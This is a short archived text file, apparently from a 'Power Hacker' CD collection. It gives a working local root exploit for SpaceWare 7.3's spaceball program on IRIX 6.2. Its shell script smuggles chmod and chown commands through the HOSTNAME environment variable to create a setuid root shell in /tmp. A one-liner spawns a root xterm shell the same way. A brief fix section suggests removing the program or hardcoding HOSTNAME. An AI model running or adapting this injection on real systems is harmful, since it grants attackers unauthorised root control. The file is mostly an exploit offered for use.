home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / spaceball.txt < prev    next >
Encoding:
Text File  |  2001-11-06  |  1.1 KB  |  39 lines
  1.  
  2.         I guess anyone who's reading this already have noticed (if
  3.         you are playing with a SpaceBall), anyway here it goes:
  4.  
  5.  ==========================================================================
  6. #!/bin/sh
  7.  
  8. SWDIR=/usr/local/SpaceWare
  9. cp /bin/sh /tmp/sh
  10.  
  11. echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" \
  12. $SWDIR/spaceball > /dev/null 2>&1
  13. echo 6 | HOSTNAME="/bin/chown root /tmp/sh" \
  14. $SWDIR/spaceball > /dev/null 2>&1
  15.  
  16. /tmp/sh
  17.  ==========================================================================
  18.  
  19.         more information:
  20.  
  21.         IRIX 6.2
  22.         spaceware 7.3 v1.0 (http://www.spacetec.com/)
  23.         ftp://ftp.spacetec.com/put/spaceball2003and3003/drivers/app.irix.7_3.tar
  24.  
  25.         (Obviously, you can use HOSTNAME for any command you want
  26.         to run as root, like
  27. echo 6 | HOSTNAME="`which xterm` -e `which sh`" /usr/local/SpaceWare/spaceball
  28.         )
  29.  
  30.         Fix:
  31.  
  32.         a) rm (since spaceball.sh does lots of nasty things, like
  33.         running spaceball demos as root, probably this is the best
  34.         solution)
  35.  
  36.         b) set HOSTNAME=/usr/bsd/hostname in the "Utilities" section of
  37.         $SWDIR/spaceball.sh
  38.  
  39.